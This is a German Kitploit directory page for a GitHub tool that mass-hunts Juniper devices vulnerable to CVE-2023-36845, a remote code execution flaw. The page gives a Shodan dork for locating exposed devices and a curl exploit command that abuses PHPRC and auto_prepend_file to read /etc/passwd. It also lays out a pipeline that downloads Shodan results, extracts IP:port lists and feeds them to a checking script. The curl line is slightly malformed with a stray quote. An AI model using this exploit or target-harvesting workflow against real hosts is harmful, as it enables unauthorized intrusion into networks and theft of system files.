Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE (Remote Code Execution) CVE-2023-36845 ist eine Schwachstelle, die in der Software von Juniper identifiziert wurde. Dieser spezielle Fehler ermöglicht die Remote-Codeausführung, was bedeutet, dass ein Angreifer beliebigen Code auf einem System ausführen könnte, ohne physischen Zugriff auf das Gerät zu benötigen. | Kitploit
Tools/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Über

Juniper RCE (Remote Code Execution) CVE-2023-36845 ist eine Schwachstelle, die in der Software von Juniper identifiziert wurde. Dieser spezielle Fehler ermöglicht die Remote-Codeausführung, was bedeutet, dass ein Angreifer beliebigen Code auf einem System ausführen könnte, ohne physischen Zugriff auf das Gerät zu benötigen.

Teilen

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 ist eine Sicherheitslücke, die in der Juniper-Software identifiziert wurde. Diese spezielle Schwachstelle ermöglicht die Ausführung von entferntem Code (Remote Code Execution), was bedeutet, dass ein Angreifer willkürlichen Code auf einem System ausführen kann, ohne physischen Zugriff auf das Gerät zu haben.

So findet man es:

Shodan Dork: http.favicon.hash:2141724739

Verwenden Sie es mit relevanten anderen Dorks wie SSL-Zertifikaten, Organisationsnamen usw. für eine gezieltere Suche.

Ausnutzung für einen einzelnen Host:

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

Automatisierung:

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com' #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

Tool herunterladen